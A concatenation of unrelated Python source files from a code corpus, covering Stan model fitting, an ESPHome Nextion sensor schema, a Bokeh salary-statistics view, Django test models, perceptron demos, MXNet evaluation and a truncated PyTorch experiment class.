with open(join(res_dir, 'sprs_prevalence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f)
# Fit with incidence model and dump results to disk
fit = incidence_model.sampling(data_incidence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_incidence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f) | experiments/scripts/sparsity_test.py | import pandas as pd
import pickle
from os.path import join
model_dir = '../../stan_models/models_bin/'
ts_dir = '../time_series/SM/'
res_dir = '../results/SM/'
# Load models
with open(join(model_dir, 'prevalence_model.bin'), 'rb') as f:
prevalence_model = pickle.load(f)
with open(join(model_dir, 'incidence_model.bin'), 'rb') as f:
incidence_model = pickle.load(f)
# Loop over time series and sample from the posterior distribution
for ts_file in ['T50_sigma_0p02',
'T100_sigma_0p02',
'T250_sigma_0p02']:
# Read data as CSV
df = pd.read_csv(join(ts_dir, ts_file + ".txt"), sep='\t')
# Normalize time
t = df['t'] / df['t'].iloc[-1]
# Prepare data dicts
data_prevalence = {'T': len(t),
'ts': t,
'Y': df['Y(t)'],
# Hyperparameters
'scale_sigma': 1,
'scale_gamma': 100,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.1,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
data_incidence = {'T': len(t),
'ts': t,
'Z': df['Z(t)'],
'population': 100000,
'max_Y': 1,
# Hyperparameters
'scale_sigma': 1,
'loc_gamma': 0.1 * df['t'].iloc[-1],
'scale_gamma': 0.1,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.00,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
# Fit with prevalence model and dump results to disk
fit = prevalence_model.sampling(data_prevalence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_prevalence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f)
# Fit with incidence model and dump results to disk
fit = incidence_model.sampling(data_incidence,
iter=1000, chains=4,
control={'max_treedepth': 15})
with open(join(res_dir, 'sprs_incidence_' + ts_file + '.pck'), 'wb') as f:
pickle.dump(fit, f) | 0.560974 | 0.254231 |
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_COMPONENT_ID,
)
from .. import nextion_ns, CONF_NEXTION_ID
from ..base_component import (
setup_component_core_,
CONFIG_SENSOR_COMPONENT_SCHEMA,
CONF_VARIABLE_NAME,
CONF_COMPONENT_NAME,
CONF_PRECISION,
CONF_WAVE_CHANNEL_ID,
CONF_WAVE_MAX_VALUE,
CONF_WAVEFORM_SEND_LAST_VALUE,
CONF_WAVE_MAX_LENGTH,
)
CODEOWNERS = ["@senexcrenshaw"]
NextionSensor = nextion_ns.class_("NextionSensor", sensor.Sensor, cg.PollingComponent)
def CheckWaveID(value):
value = cv.int_(value)
if value < 0 or value > 3:
raise cv.Invalid(f"Valid range for {CONF_WAVE_CHANNEL_ID} is 0-3")
return value
def _validate(config):
if CONF_WAVE_CHANNEL_ID in config and CONF_COMPONENT_ID not in config:
raise cv.Invalid(
f"{CONF_COMPONENT_ID} is required when {CONF_WAVE_CHANNEL_ID} is set"
)
return config
CONFIG_SCHEMA = cv.All(
sensor.sensor_schema(
NextionSensor,
accuracy_decimals=2,
)
.extend(
{
cv.Optional(CONF_PRECISION, default=0): cv.int_range(min=0, max=8),
cv.Optional(CONF_WAVE_CHANNEL_ID): CheckWaveID,
cv.Optional(CONF_COMPONENT_ID): cv.uint8_t,
cv.Optional(CONF_WAVE_MAX_LENGTH, default=255): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVE_MAX_VALUE, default=100): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVEFORM_SEND_LAST_VALUE, default=True): cv.boolean,
}
)
.extend(CONFIG_SENSOR_COMPONENT_SCHEMA)
.extend(cv.polling_component_schema("never")),
cv.has_exactly_one_key(CONF_COMPONENT_ID, CONF_COMPONENT_NAME, CONF_VARIABLE_NAME),
_validate,
)
async def to_code(config):
hub = await cg.get_variable(config[CONF_NEXTION_ID])
var = cg.new_Pvariable(config[CONF_ID], hub)
await cg.register_component(var, config)
await sensor.register_sensor(var, config)
cg.add(hub.register_sensor_component(var))
await setup_component_core_(var, config, ".val")
if CONF_PRECISION in config:
cg.add(var.set_precision(config[CONF_PRECISION]))
if CONF_COMPONENT_ID in config:
cg.add(var.set_component_id(config[CONF_COMPONENT_ID]))
if CONF_WAVE_CHANNEL_ID in config:
cg.add(var.set_wave_channel_id(config[CONF_WAVE_CHANNEL_ID]))
if CONF_WAVEFORM_SEND_LAST_VALUE in config:
cg.add(var.set_waveform_send_last_value(config[CONF_WAVEFORM_SEND_LAST_VALUE]))
if CONF_WAVE_MAX_VALUE in config:
cg.add(var.set_wave_max_value(config[CONF_WAVE_MAX_VALUE]))
if CONF_WAVE_MAX_LENGTH in config:
cg.add(var.set_wave_max_length(config[CONF_WAVE_MAX_LENGTH])) | esphome/components/nextion/sensor/__init__.py | import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_COMPONENT_ID,
)
from .. import nextion_ns, CONF_NEXTION_ID
from ..base_component import (
setup_component_core_,
CONFIG_SENSOR_COMPONENT_SCHEMA,
CONF_VARIABLE_NAME,
CONF_COMPONENT_NAME,
CONF_PRECISION,
CONF_WAVE_CHANNEL_ID,
CONF_WAVE_MAX_VALUE,
CONF_WAVEFORM_SEND_LAST_VALUE,
CONF_WAVE_MAX_LENGTH,
)
CODEOWNERS = ["@senexcrenshaw"]
NextionSensor = nextion_ns.class_("NextionSensor", sensor.Sensor, cg.PollingComponent)
def CheckWaveID(value):
value = cv.int_(value)
if value < 0 or value > 3:
raise cv.Invalid(f"Valid range for {CONF_WAVE_CHANNEL_ID} is 0-3")
return value
def _validate(config):
if CONF_WAVE_CHANNEL_ID in config and CONF_COMPONENT_ID not in config:
raise cv.Invalid(
f"{CONF_COMPONENT_ID} is required when {CONF_WAVE_CHANNEL_ID} is set"
)
return config
CONFIG_SCHEMA = cv.All(
sensor.sensor_schema(
NextionSensor,
accuracy_decimals=2,
)
.extend(
{
cv.Optional(CONF_PRECISION, default=0): cv.int_range(min=0, max=8),
cv.Optional(CONF_WAVE_CHANNEL_ID): CheckWaveID,
cv.Optional(CONF_COMPONENT_ID): cv.uint8_t,
cv.Optional(CONF_WAVE_MAX_LENGTH, default=255): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVE_MAX_VALUE, default=100): cv.int_range(
min=1, max=1024
),
cv.Optional(CONF_WAVEFORM_SEND_LAST_VALUE, default=True): cv.boolean,
}
)
.extend(CONFIG_SENSOR_COMPONENT_SCHEMA)
.extend(cv.polling_component_schema("never")),
cv.has_exactly_one_key(CONF_COMPONENT_ID, CONF_COMPONENT_NAME, CONF_VARIABLE_NAME),
_validate,
)
async def to_code(config):
hub = await cg.get_variable(config[CONF_NEXTION_ID])
var = cg.new_Pvariable(config[CONF_ID], hub)
await cg.register_component(var, config)
await sensor.register_sensor(var, config)
cg.add(hub.register_sensor_component(var))
await setup_component_core_(var, config, ".val")
if CONF_PRECISION in config:
cg.add(var.set_precision(config[CONF_PRECISION]))
if CONF_COMPONENT_ID in config:
cg.add(var.set_component_id(config[CONF_COMPONENT_ID]))
if CONF_WAVE_CHANNEL_ID in config:
cg.add(var.set_wave_channel_id(config[CONF_WAVE_CHANNEL_ID]))
if CONF_WAVEFORM_SEND_LAST_VALUE in config:
cg.add(var.set_waveform_send_last_value(config[CONF_WAVEFORM_SEND_LAST_VALUE]))
if CONF_WAVE_MAX_VALUE in config:
cg.add(var.set_wave_max_value(config[CONF_WAVE_MAX_VALUE]))
if CONF_WAVE_MAX_LENGTH in config:
cg.add(var.set_wave_max_length(config[CONF_WAVE_MAX_LENGTH])) | 0.398055 | 0.075483 |
from pyramid.view import view_config
from pyramid.httpexceptions import HTTPUnauthorized
from ..models import Association, Account
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.layouts import gridplot
from bokeh.embed import components
from bokeh.palettes import Spectral6, Spectral5
from bokeh.transform import factor_cmap
import pandas as pd
import numpy as np
@view_config(route_name='stat', renderer='../templates/stat.jinja2',
request_method='GET')
def stat_view(request):
"""View statistics scraped from indeed."""
try:
query = request.dbsession.query(Account)
admin = query.filter(
Account.username == request.authenticated_userid).one_or_none()
if admin.admin is True:
# From here, down to next comment, is data we've tracked but
# decided not to render.
relationships = request.dbsession.query(Association)
count = {}
for each in relationships:
word = each.keyword_id
if word not in count:
count[word] = 1
else:
count[word] += 1
top = 1
for value in count.values():
if top <= value:
top = value * 1.5
users = list(count.values())
keywords = list(count.keys())
source = ColumnDataSource(
data=dict(keywords=keywords, users=users))
p = figure(x_range=keywords, y_range=(0, top), plot_height=500,
title="Current Stored Searches")
p.vbar(x='keywords', top='users', width=0.9, legend=False,
source=source)
p.xgrid.grid_line_color = None
p.legend.orientation = "horizontal"
p.legend.location = "top_center"
# End of unrendered tracking above.
lang = [
'./mass_scraper/pythonresults.csv',
'./mass_scraper/javascriptresults.csv',
'./mass_scraper/csharpresults.csv',
'./mass_scraper/javaresults.csv',
'./mass_scraper/phpresults.csv',
'./mass_scraper/cplusresults.csv']
lang_legend = [
'python', 'javascript', 'csharp', 'java', 'php', 'Cplus'
]
avg = []
place_count = 0
p1 = figure(
title="Salaries by Language", background_fill_color="#E8DDCB")
p1.xaxis[0].formatter.use_scientific = False
for lng in lang:
df = pd.read_csv(lng)
y = list(df[lang_legend[place_count]])
avg.append(np.mean(y))
hist, edges = np.histogram(y)
p1.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral6[place_count],
fill_alpha=0.3,
line_color=Spectral6[place_count],
legend=lang_legend[place_count])
place_count += 1
p1.legend.location = "top_center"
p1.legend.click_policy = "hide"
p2 = figure(
x_range=lang_legend, y_range=(0, max(avg)), plot_height=500,
title="Average Salaries by Language")
source = ColumnDataSource(
data=dict(lang_legend=lang_legend, avg=avg))
p2.vbar(
x='lang_legend',
top='avg',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'lang_legend', palette=Spectral6, factors=lang_legend))
p2.yaxis[0].formatter.use_scientific = False
job = [
'./mass_scraper/datascienceresults.csv',
'./mass_scraper/DBAresults.csv',
'./mass_scraper/softwaredevresults.csv',
'./mass_scraper/uxresults.csv',
'./mass_scraper/webdevresults.csv'
]
job_legend = ['datascience', 'dba', 'softwaredev', 'ux', 'webdev']
avg1 = []
place_count = 0
p3 = figure(
title="Salaries by Job", background_fill_color="#E8DDCB")
p3.xaxis[0].formatter.use_scientific = False
for jab in job:
df = pd.read_csv(jab)
y = list(df[job_legend[place_count]])
avg1.append(np.mean(y))
hist, edges = np.histogram(y)
p3.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral5[place_count],
fill_alpha=0.3,
line_color=Spectral5[place_count],
legend=job_legend[place_count])
place_count += 1
p3.legend.location = "top_center"
p3.legend.click_policy = "hide"
p4 = figure(x_range=job_legend, y_range=(0, max(avg1)),
plot_height=500, title="Average Salaries by Job")
source = ColumnDataSource(
data=dict(job_legend=job_legend, avg1=avg1))
p4.vbar(
x='job_legend',
top='avg1',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'job_legend', palette=Spectral5, factors=job_legend))
p4.yaxis[0].formatter.use_scientific = False
all_plots = gridplot([[p1, p3], [p2, p4]])
script, div = components(all_plots)
return {'script': script, 'div': div}
except AttributeError:
return HTTPUnauthorized() | opportune/views/stat.py | from pyramid.view import view_config
from pyramid.httpexceptions import HTTPUnauthorized
from ..models import Association, Account
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.layouts import gridplot
from bokeh.embed import components
from bokeh.palettes import Spectral6, Spectral5
from bokeh.transform import factor_cmap
import pandas as pd
import numpy as np
@view_config(route_name='stat', renderer='../templates/stat.jinja2',
request_method='GET')
def stat_view(request):
"""View statistics scraped from indeed."""
try:
query = request.dbsession.query(Account)
admin = query.filter(
Account.username == request.authenticated_userid).one_or_none()
if admin.admin is True:
# From here, down to next comment, is data we've tracked but
# decided not to render.
relationships = request.dbsession.query(Association)
count = {}
for each in relationships:
word = each.keyword_id
if word not in count:
count[word] = 1
else:
count[word] += 1
top = 1
for value in count.values():
if top <= value:
top = value * 1.5
users = list(count.values())
keywords = list(count.keys())
source = ColumnDataSource(
data=dict(keywords=keywords, users=users))
p = figure(x_range=keywords, y_range=(0, top), plot_height=500,
title="Current Stored Searches")
p.vbar(x='keywords', top='users', width=0.9, legend=False,
source=source)
p.xgrid.grid_line_color = None
p.legend.orientation = "horizontal"
p.legend.location = "top_center"
# End of unrendered tracking above.
lang = [
'./mass_scraper/pythonresults.csv',
'./mass_scraper/javascriptresults.csv',
'./mass_scraper/csharpresults.csv',
'./mass_scraper/javaresults.csv',
'./mass_scraper/phpresults.csv',
'./mass_scraper/cplusresults.csv']
lang_legend = [
'python', 'javascript', 'csharp', 'java', 'php', 'Cplus'
]
avg = []
place_count = 0
p1 = figure(
title="Salaries by Language", background_fill_color="#E8DDCB")
p1.xaxis[0].formatter.use_scientific = False
for lng in lang:
df = pd.read_csv(lng)
y = list(df[lang_legend[place_count]])
avg.append(np.mean(y))
hist, edges = np.histogram(y)
p1.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral6[place_count],
fill_alpha=0.3,
line_color=Spectral6[place_count],
legend=lang_legend[place_count])
place_count += 1
p1.legend.location = "top_center"
p1.legend.click_policy = "hide"
p2 = figure(
x_range=lang_legend, y_range=(0, max(avg)), plot_height=500,
title="Average Salaries by Language")
source = ColumnDataSource(
data=dict(lang_legend=lang_legend, avg=avg))
p2.vbar(
x='lang_legend',
top='avg',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'lang_legend', palette=Spectral6, factors=lang_legend))
p2.yaxis[0].formatter.use_scientific = False
job = [
'./mass_scraper/datascienceresults.csv',
'./mass_scraper/DBAresults.csv',
'./mass_scraper/softwaredevresults.csv',
'./mass_scraper/uxresults.csv',
'./mass_scraper/webdevresults.csv'
]
job_legend = ['datascience', 'dba', 'softwaredev', 'ux', 'webdev']
avg1 = []
place_count = 0
p3 = figure(
title="Salaries by Job", background_fill_color="#E8DDCB")
p3.xaxis[0].formatter.use_scientific = False
for jab in job:
df = pd.read_csv(jab)
y = list(df[job_legend[place_count]])
avg1.append(np.mean(y))
hist, edges = np.histogram(y)
p3.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral5[place_count],
fill_alpha=0.3,
line_color=Spectral5[place_count],
legend=job_legend[place_count])
place_count += 1
p3.legend.location = "top_center"
p3.legend.click_policy = "hide"
p4 = figure(x_range=job_legend, y_range=(0, max(avg1)),
plot_height=500, title="Average Salaries by Job")
source = ColumnDataSource(
data=dict(job_legend=job_legend, avg1=avg1))
p4.vbar(
x='job_legend',
top='avg1',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'job_legend', palette=Spectral5, factors=job_legend))
p4.yaxis[0].formatter.use_scientific = False
all_plots = gridplot([[p1, p3], [p2, p4]])
script, div = components(all_plots)
return {'script': script, 'div': div}
except AttributeError:
return HTTPUnauthorized() | 0.657098 | 0.296642 |
from django.db import models
class SampleModel(models.Model):
a = models.CharField(max_length=50, null=True)
b = models.CharField(max_length=50, null=True)
class SampleModelWithFK(models.Model):
parent = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class SampleModelForAutofilter(models.Model):
fk = models.ForeignKey(SampleModel, related_name="fk_1", on_delete=models.CASCADE)
non_indexed_fk = models.ForeignKey(SampleModel, related_name="fk_2", db_index=False, on_delete=models.CASCADE)
indexed_int = models.IntegerField(db_index=True)
non_indexed_int = models.IntegerField()
indexed_char = models.CharField(max_length=255, db_index=True)
non_indexed_char = models.CharField(max_length=255)
indexed_text = models.TextField(db_index=True)
non_indexed_text = models.TextField()
indexed_url = models.URLField(db_index=True)
non_indexed_url = models.URLField()
indexed_email = models.EmailField(db_index=True)
non_indexed_email = models.EmailField()
nullable_field = models.IntegerField(null=True, db_index=True)
unique_text = models.CharField(max_length=255, unique=True)
@property
def some_property(self):
return "property"
class ThirdLevelModelForNestedFilteringTest(models.Model):
name = models.CharField(max_length=255)
class SecondLevelModelForContextPassingTest(models.Model):
name = models.CharField(max_length=255)
third = models.ForeignKey(ThirdLevelModelForNestedFilteringTest, related_name="second", null=True,
on_delete=models.CASCADE)
class TopLevelModelForContextPassingTest(models.Model):
second = models.ForeignKey(SecondLevelModelForContextPassingTest, related_name="top", on_delete=models.CASCADE)
name = models.CharField(max_length=255)
class AutoOptimization3Model(models.Model):
name = models.CharField(max_length=255)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization2Model(models.Model):
name = models.CharField(max_length=255)
fk_3_1 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_1", on_delete=models.CASCADE)
fk_3_2 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_2", on_delete=models.CASCADE)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization1Model(models.Model):
name = models.CharField(max_length=255)
fk_2 = models.ForeignKey(AutoOptimization2Model, related_name="reverse_1", on_delete=models.CASCADE)
sample_m2m = models.ManyToManyField(SampleModel) | tests/models.py | from django.db import models
class SampleModel(models.Model):
a = models.CharField(max_length=50, null=True)
b = models.CharField(max_length=50, null=True)
class SampleModelWithFK(models.Model):
parent = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class SampleModelForAutofilter(models.Model):
fk = models.ForeignKey(SampleModel, related_name="fk_1", on_delete=models.CASCADE)
non_indexed_fk = models.ForeignKey(SampleModel, related_name="fk_2", db_index=False, on_delete=models.CASCADE)
indexed_int = models.IntegerField(db_index=True)
non_indexed_int = models.IntegerField()
indexed_char = models.CharField(max_length=255, db_index=True)
non_indexed_char = models.CharField(max_length=255)
indexed_text = models.TextField(db_index=True)
non_indexed_text = models.TextField()
indexed_url = models.URLField(db_index=True)
non_indexed_url = models.URLField()
indexed_email = models.EmailField(db_index=True)
non_indexed_email = models.EmailField()
nullable_field = models.IntegerField(null=True, db_index=True)
unique_text = models.CharField(max_length=255, unique=True)
@property
def some_property(self):
return "property"
class ThirdLevelModelForNestedFilteringTest(models.Model):
name = models.CharField(max_length=255)
class SecondLevelModelForContextPassingTest(models.Model):
name = models.CharField(max_length=255)
third = models.ForeignKey(ThirdLevelModelForNestedFilteringTest, related_name="second", null=True,
on_delete=models.CASCADE)
class TopLevelModelForContextPassingTest(models.Model):
second = models.ForeignKey(SecondLevelModelForContextPassingTest, related_name="top", on_delete=models.CASCADE)
name = models.CharField(max_length=255)
class AutoOptimization3Model(models.Model):
name = models.CharField(max_length=255)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization2Model(models.Model):
name = models.CharField(max_length=255)
fk_3_1 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_1", on_delete=models.CASCADE)
fk_3_2 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_2", on_delete=models.CASCADE)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization1Model(models.Model):
name = models.CharField(max_length=255)
fk_2 = models.ForeignKey(AutoOptimization2Model, related_name="reverse_1", on_delete=models.CASCADE)
sample_m2m = models.ManyToManyField(SampleModel) | 0.711631 | 0.214116 |
from utils import *
from sklearn.linear_model import Perceptron
from sklearn.datasets import make_classification
def test_mnist():
trX, trY, teX, teY = load_mnist()
# get 2 class data and label
train_datas = []
train_labels = []
test_datas = []
test_labels = []
for x in range(trX.shape[0]):
if trY[x] == 1.0 or trY[x]== 8.0:
train_datas.append(trX[x].flatten())
train_labels.append(trY[x])
for x in range(teX.shape[0]):
if teY[x] == 1.0 or teY[x]== 8.0:
test_datas.append(trX[x].flatten())
test_labels.append(trY[x])
print(np.array(train_datas).shape)
clf = Perceptron(penalty='l2', fit_intercept=False ,max_iter=500, shuffle=False)
clf.fit(np.array(train_datas),np.array(train_labels))
print(clf.coef_)
print(clf.intercept_)
acc = clf.score(np.array(test_datas),np.array(test_labels))
print(acc)
def test():
x,y = make_classification(n_samples=1000, n_features=2,n_redundant=0,n_informative=1,n_clusters_per_class=1)
#训练数据和测试数据
x_data_train = x[:800,:]
x_data_test = x[800:,:]
y_data_train = y[:800]
y_data_test = y[800:]
#正例和反例
positive_x1 = [x[i,0] for i in range(1000) if y[i] == 1]
positive_x2 = [x[i,1] for i in range(1000) if y[i] == 1]
negetive_x1 = [x[i,0] for i in range(1000) if y[i] == 0]
negetive_x2 = [x[i,1] for i in range(1000) if y[i] == 0]
from sklearn.linear_model import Perceptron
#定义感知机
clf = Perceptron(fit_intercept=False, max_iter=3000, shuffle=False)
#使用训练数据进行训练
clf.fit(x_data_train,y_data_train)
#得到训练结果,权重矩阵
print(clf.coef_)
#超平面的截距
print(clf.intercept_)
#利用测试数据进行验证
acc = clf.score(x_data_test,y_data_test)
print(acc)
from matplotlib import pyplot as plt
#画出正例和反例的散点图
plt.scatter(positive_x1,positive_x2,c='red')
plt.scatter(negetive_x1,negetive_x2,c='blue')
#画出超平面
line_x = np.arange(-max(positive_x1),max(positive_x1))
line_y = line_x * (-clf.coef_[0][0] / clf.coef_[0][1]) - clf.intercept_
plt.plot(line_x,line_y)
plt.show()
if __name__ == '__main__':
test_mnist()
test() | Perceptron.py | from utils import *
from sklearn.linear_model import Perceptron
from sklearn.datasets import make_classification
def test_mnist():
trX, trY, teX, teY = load_mnist()
# get 2 class data and label
train_datas = []
train_labels = []
test_datas = []
test_labels = []
for x in range(trX.shape[0]):
if trY[x] == 1.0 or trY[x]== 8.0:
train_datas.append(trX[x].flatten())
train_labels.append(trY[x])
for x in range(teX.shape[0]):
if teY[x] == 1.0 or teY[x]== 8.0:
test_datas.append(trX[x].flatten())
test_labels.append(trY[x])
print(np.array(train_datas).shape)
clf = Perceptron(penalty='l2', fit_intercept=False ,max_iter=500, shuffle=False)
clf.fit(np.array(train_datas),np.array(train_labels))
print(clf.coef_)
print(clf.intercept_)
acc = clf.score(np.array(test_datas),np.array(test_labels))
print(acc)
def test():
x,y = make_classification(n_samples=1000, n_features=2,n_redundant=0,n_informative=1,n_clusters_per_class=1)
#训练数据和测试数据
x_data_train = x[:800,:]
x_data_test = x[800:,:]
y_data_train = y[:800]
y_data_test = y[800:]
#正例和反例
positive_x1 = [x[i,0] for i in range(1000) if y[i] == 1]
positive_x2 = [x[i,1] for i in range(1000) if y[i] == 1]
negetive_x1 = [x[i,0] for i in range(1000) if y[i] == 0]
negetive_x2 = [x[i,1] for i in range(1000) if y[i] == 0]
from sklearn.linear_model import Perceptron
#定义感知机
clf = Perceptron(fit_intercept=False, max_iter=3000, shuffle=False)
#使用训练数据进行训练
clf.fit(x_data_train,y_data_train)
#得到训练结果,权重矩阵
print(clf.coef_)
#超平面的截距
print(clf.intercept_)
#利用测试数据进行验证
acc = clf.score(x_data_test,y_data_test)
print(acc)
from matplotlib import pyplot as plt
#画出正例和反例的散点图
plt.scatter(positive_x1,positive_x2,c='red')
plt.scatter(negetive_x1,negetive_x2,c='blue')
#画出超平面
line_x = np.arange(-max(positive_x1),max(positive_x1))
line_y = line_x * (-clf.coef_[0][0] / clf.coef_[0][1]) - clf.intercept_
plt.plot(line_x,line_y)
plt.show()
if __name__ == '__main__':
test_mnist()
test() | 0.45423 | 0.661363 |
import os
import argparse
import mxnet
from mxnet import gluon
from mxnet.gluon.data.vision.transforms import Compose, ToTensor, Normalize
import utils
from datahelper import MultiViewImageDataset
from model import MVRNN
def parse_args():
'''PARAMETERS'''
parser = argparse.ArgumentParser('ViewSequenceNet')
parser.add_argument('--model', type=str, default='model', help='name of the model file')
parser.add_argument('--batch_size', type=int, default=2, help='batch size')
parser.add_argument('--batch_update_period', type=int, default=64,
help='do back propagation after every 64 batches')
parser.add_argument('--gpu', type=int, nargs='+', default=(0,), help='')
parser.add_argument('--dataset_path', type=str, default='/media/zenn/files/dataset/modelnet10-multiview',
help='path to the dataset')
parser.add_argument('--checkpoint', type=str, default=None, help='location of the checkpoint')
parser.add_argument('--num_views', type=int, default=12, help='number of views')
parser.add_argument('--num_classes', type=int, default=10, help='number of classes')
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
'''initialize the network'''
ctx = [mxnet.gpu(gpu_id) for gpu_id in args.gpu]
net = MVRNN(cnn_arch='vgg11_bn', cnn_feature_length=4096, num_views=args.num_views, num_class=args.num_classes,
pretrained=True, pretrained_cnn=None, ctx=ctx)
net.load_parameters(args.checkpoint, ctx=ctx)
net.hybridize()
metric = mxnet.metric.Accuracy()
test_ds = MultiViewImageDataset(os.path.join(args.dataset_path, 'test'), args.num_views,
transform=Compose([
ToTensor(),
Normalize(mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225))]))
loader = gluon.data.DataLoader
test_data = loader(test_ds, args.batch_size, shuffle=False, last_batch='keep')
print(
'test on dataset %s, acc %s ' % (
args.dataset_path, utils.test(metric, ctx, net, test_data, num_views=args.num_views,
num_class=args.num_classes))) | test.py | import os
import argparse
import mxnet
from mxnet import gluon
from mxnet.gluon.data.vision.transforms import Compose, ToTensor, Normalize
import utils
from datahelper import MultiViewImageDataset
from model import MVRNN
def parse_args():
'''PARAMETERS'''
parser = argparse.ArgumentParser('ViewSequenceNet')
parser.add_argument('--model', type=str, default='model', help='name of the model file')
parser.add_argument('--batch_size', type=int, default=2, help='batch size')
parser.add_argument('--batch_update_period', type=int, default=64,
help='do back propagation after every 64 batches')
parser.add_argument('--gpu', type=int, nargs='+', default=(0,), help='')
parser.add_argument('--dataset_path', type=str, default='/media/zenn/files/dataset/modelnet10-multiview',
help='path to the dataset')
parser.add_argument('--checkpoint', type=str, default=None, help='location of the checkpoint')
parser.add_argument('--num_views', type=int, default=12, help='number of views')
parser.add_argument('--num_classes', type=int, default=10, help='number of classes')
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
'''initialize the network'''
ctx = [mxnet.gpu(gpu_id) for gpu_id in args.gpu]
net = MVRNN(cnn_arch='vgg11_bn', cnn_feature_length=4096, num_views=args.num_views, num_class=args.num_classes,
pretrained=True, pretrained_cnn=None, ctx=ctx)
net.load_parameters(args.checkpoint, ctx=ctx)
net.hybridize()
metric = mxnet.metric.Accuracy()
test_ds = MultiViewImageDataset(os.path.join(args.dataset_path, 'test'), args.num_views,
transform=Compose([
ToTensor(),
Normalize(mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225))]))
loader = gluon.data.DataLoader
test_data = loader(test_ds, args.batch_size, shuffle=False, last_batch='keep')
print(
'test on dataset %s, acc %s ' % (
args.dataset_path, utils.test(metric, ctx, net, test_data, num_views=args.num_views,
num_class=args.num_classes))) | 0.568536 | 0.137967 |
import os
import re
import shutil
import time
from collections import defaultdict
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torch.nn.utils import clip_grad_norm_
import utils
from utils import cache
class AbstractionEmbedding:
names = {
'loss': ['embed', 'abstr'],
'targets': ['embed', 'abstr'],
'outputs': ['embed', 'abstr'],
}
def __init__(self, **params):
self.params = params
for k, v in params.items():
setattr(self, k, v)
self.best_acc1 = 0
self.check_rootfolders()
self.load_checkpont()
self.logger.prepare(self)
cudnn.enabled = self.params['cudnn_enabled']
cudnn.benchmark = self.params['cudnn_benchmark']
self.criterion = {n: c.cuda() for n, c in self.criterion.items()}
print(f'Starting experiment: {self.name}')
def run(self):
if self.params['evaluate']:
return self.evaluate()
for epoch in range(self.params['start_epoch'], self.params['num_epochs'],):
# Train for one epoch
self.train(epoch)
# Evaluate on validation set
if (epoch + 1) % self.val_freq == 0 or epoch == self.num_epochs - 1:
meters = self.validate(epoch)
acc1 = meters[self.return_metric].avg
self.scheduler.step(meters['full'].avg)
# Remember best acc@1 and save checkpoint
is_best = acc1 > self.best_acc1
self.best_acc1 = max(acc1, self.best_acc1)
self.save_checkpoint(
{
'epoch': epoch + 1,
# 'params': self.params,
# 'arch': self.model.module.arch,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_acc1': self.best_acc1,
},
is_best,
)
def train(self, epoch):
# Switch to train mode
self.model.train()
# self.meters = self.get_meters(self.__class__.__name__)
self.meters = self.logger.get_progress_meter(
epoch, len(self.dataloader['train'])
)
end = time.time()
for i, (input, target) in enumerate(self.dataloader['train']):
# Measure data loading time
self.meters['data_time'].update(time.time() - end)
# Step the experiment
self.step(input, target)
# Measure elapsed time
self.meters['batch_time'].update(time.time() - end)
end = time.time()
if i % self.params['log_freq'] == 0:
self.logger.log(i, mode='train', epoch=epoch)
if i % self.params['checkpoint_freq'] == 0:
self.save_checkpoint(
{
'epoch': epoch + 1,
# 'params': self.params,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_acc1': self.best_acc1,
},
False,
)
if self.params['max_step'] is not None:
if i % self.params['max_step'] == 0:
break
def validate(self, epoch, evaluate=False):
# Switch to evaluate mode
self.model.eval()
self.meters = self.logger.get_progress_meter(epoch, len(self.dataloader['val']))
if evaluate:
self.probs = defaultdict(list)
self.preds = defaultdict(list)
self.outputs = defaultdict(list)
self.targets = defaultdict(list)
with torch.no_grad():
end = time.time()
for i, (input, target) in enumerate(self.dataloader['val']):
self.meters['data_time'].update(time.time() - end)
mode = 'eval' if evaluate else 'val'
# Step the model
self.step(input, target, mode=mode)
# Measure elapsed time
self.meters['batch_time'].update(time.time() - end)
end = time.time()
